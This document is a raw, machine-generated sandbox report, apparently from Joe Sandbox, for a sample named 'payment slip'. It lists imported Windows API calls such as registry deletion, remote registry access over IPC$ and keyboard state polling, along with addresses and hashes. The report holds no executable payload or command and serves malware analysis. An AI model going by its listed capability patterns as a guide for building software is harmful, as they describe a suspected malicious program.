                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6C5
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6D7
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6E9
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6FB
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D70D
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D71F
                                          • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D731
                                        • _free.LIBCMT ref: 0006DA96
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006DAB8
                                        • _free.LIBCMT ref: 0006DACD
                                        • _free.LIBCMT ref: 0006DAD8
                                        • _free.LIBCMT ref: 0006DAFA
                                        • _free.LIBCMT ref: 0006DB0D
                                        • _free.LIBCMT ref: 0006DB1B
                                        • _free.LIBCMT ref: 0006DB26
                                        • _free.LIBCMT ref: 0006DB5E
                                        • _free.LIBCMT ref: 0006DB65
                                        • _free.LIBCMT ref: 0006DB82
                                        • _free.LIBCMT ref: 0006DB9A
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                        • Instruction ID: 551bb117f3117c10848991871839812c617d277902a6eb395c088ae7af53544e
                                        • Opcode Fuzzy Hash: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                        • Instruction Fuzzy Hash: 1B315831B08604DFEB65AA79E845BAAB7EBFF40350F15442AE449D7192DF30EC80CB20
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 0009369C
                                        • _wcslen.LIBCMT ref: 000936A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00093797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 0009380C
                                        • GetDlgCtrlID.USER32(?), ref: 0009385D
                                        • GetWindowRect.USER32(?,?), ref: 00093882
                                        • GetParent.USER32(?), ref: 000938A0
                                        • ScreenToClient.USER32(00000000), ref: 000938A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00093921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0009395D
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00094994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000949DA
                                        • _wcslen.LIBCMT ref: 000949EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 000949F7
                                        • _wcsstr.LIBVCRUNTIME ref: 00094A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00094A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00094A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00094AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00094B20
                                        • GetWindowRect.USER32(?,?), ref: 00094B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000C3A9D
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000C3AA0
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C3AC7
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C3AEA
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000C3B62
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 000C3BAC
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 000C3BC7
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 000C3BE2
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 000C3BF6
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 000C3C13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID: U
                                        • API String ID: 312131281-2399391058
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009DC20
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0009DC46
                                        • _wcslen.LIBCMT ref: 0009DC50
                                        • _wcsstr.LIBVCRUNTIME ref: 0009DCA0
                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0009DCBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1939486746-1459072770
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000BCC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD48
                                          • Part of subcall function 000BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000BCCAA
                                          • Part of subcall function 000BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000BCCBD
                                          • Part of subcall function 000BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BCCCF
                                          • Part of subcall function 000BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD05
                                          • Part of subcall function 000BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BCCF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        APIs
                                        • timeGetTime.WINMM ref: 0009E6B4
                                          • Part of subcall function 0004E551: timeGetTime.WINMM(?,?,0009E6D4), ref: 0004E555
                                        • Sleep.KERNEL32(0000000A), ref: 0009E6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0009E705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0009E727
                                        • SetActiveWindow.USER32 ref: 0009E746
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0009E754
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0009E773
                                        • Sleep.KERNEL32(000000FA), ref: 0009E77E
                                        • IsWindow.USER32 ref: 0009E78A
                                        • EndDialog.USER32(00000000), ref: 0009E79B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0009EA5D
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0009EA73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009EA84
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0009EA96
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0009EAA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: SendString$_wcslen
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2420728520-1007645807
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00095CE2
                                        • GetWindowRect.USER32(00000000,?), ref: 00095CFB
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00095D59
                                        • GetDlgItem.USER32(?,00000002), ref: 00095D69
                                        • GetWindowRect.USER32(00000000,?), ref: 00095D7B
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00095DCF
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095DDD
                                        • GetWindowRect.USER32(00000000,?), ref: 00095DEF
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00095E31
                                        • GetDlgItem.USER32(?,000003EA), ref: 00095E44
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00095E5A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00095E67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        APIs
                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 000C5186
                                        • ShowWindow.USER32(?,00000000), ref: 000C51C7
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 000C51CD
                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 000C51D1
                                          • Part of subcall function 000C6FBA: DeleteObject.GDI32(00000000), ref: 000C6FE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C520D
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C521A
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000C524D
                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 000C5287
                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 000C5296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                        • String ID: U
                                        • API String ID: 3210457359-2399391058
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00099717
                                        • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099720
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00099742
                                        • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00099866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        APIs
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000907A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000907BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000907DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00090804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0009082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00090837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0009083C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        APIs
                                        • CreateMenu.USER32 ref: 000C3C79
                                        • SetMenu.USER32(?,00000000), ref: 000C3C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3D10
                                        • IsMenu.USER32(?), ref: 000C3D24
                                        • CreatePopupMenu.USER32 ref: 000C3D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3D5B
                                        • DrawMenuBar.USER32 ref: 000C3D63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: U$0$F
                                        • API String ID: 161812096-3933276334
                                        • Opcode ID: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                        • Instruction ID: bb9637095a2f00cd8b3ad79d04ec6e909cc9e82f39a1efc198c18bd2fab4abe8
                                        • Opcode Fuzzy Hash: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                        • Instruction Fuzzy Hash: 0E415675A11609AFEB14CF64E884FAE7BB5FF4A350F14402CF94AA7360D774AA50CB90
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000B3C5C
                                        • CoInitialize.OLE32(00000000), ref: 000B3C8A
                                        • CoUninitialize.OLE32 ref: 000B3C94
                                        • _wcslen.LIBCMT ref: 000B3D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 000B3DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 000B3ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000B3F0E
                                        • CoGetObject.OLE32(?,00000000,000CFB98,?), ref: 000B3F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 000B3F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000B3FC4
                                        • VariantClear.OLEAUT32(?), ref: 000B3FD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                        • Instruction ID: f49c25d68d58c97af2e73e69429cbfea94af3a4d45cfdb38bba1e43e42981fd1
                                        • Opcode Fuzzy Hash: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                        • Instruction Fuzzy Hash: 96C144716082059FD700DF68C884DABBBE9FF89744F24492DF98A9B251DB31EE05CB52
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 000A7AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000A7B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 000A7BA3
                                        • CoCreateInstance.OLE32(000CFD08,00000000,00000001,000F6E6C,?), ref: 000A7BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000A7C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 000A7CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 000A7D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000A7D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 000A7D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 000A7DD6
                                        • CoUninitialize.OLE32 ref: 000A7DDC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: ef6d5208303d7d8c1f336484eea158c3c03c39ce5c0ce452e6719249d56de9b5
                                        • Instruction ID: 73cb12350039057650bf679d3b36b15a0ce8277bca33355043ee7866d4c11481
                                        • Opcode Fuzzy Hash: ef6d5208303d7d8c1f336484eea158c3c03c39ce5c0ce452e6719249d56de9b5
                                        • Instruction Fuzzy Hash: 81C13B75A04109AFDB14DFA4C884DAEBBF9FF49314F148498F81A9B262DB31ED45CB90
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0008FAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0008FB08
                                        • VariantInit.OLEAUT32(?), ref: 0008FB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0008FB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 0008FB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0008FBA1
                                        • VariantClear.OLEAUT32(?), ref: 0008FBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0008FBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBCC
                                        • VariantClear.OLEAUT32(?), ref: 0008FBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                        • Instruction ID: a97e2194223989f645a9aca7e3259a2aca0b4c129962010ce1b50839bd08a709
                                        • Opcode Fuzzy Hash: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                        • Instruction Fuzzy Hash: A3414075A0021A9FEB04EF64C854DFEBBB9FF48354F008069E94AA7261DB74A945CF90
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00099CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00099D22
                                        • GetKeyState.USER32(000000A0), ref: 00099D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00099D57
                                        • GetKeyState.USER32(000000A1), ref: 00099D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00099D84
                                        • GetKeyState.USER32(00000011), ref: 00099D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 00099DAE
                                        • GetKeyState.USER32(00000012), ref: 00099DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00099DD8
                                        • GetKeyState.USER32(0000005B), ref: 00099DEA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
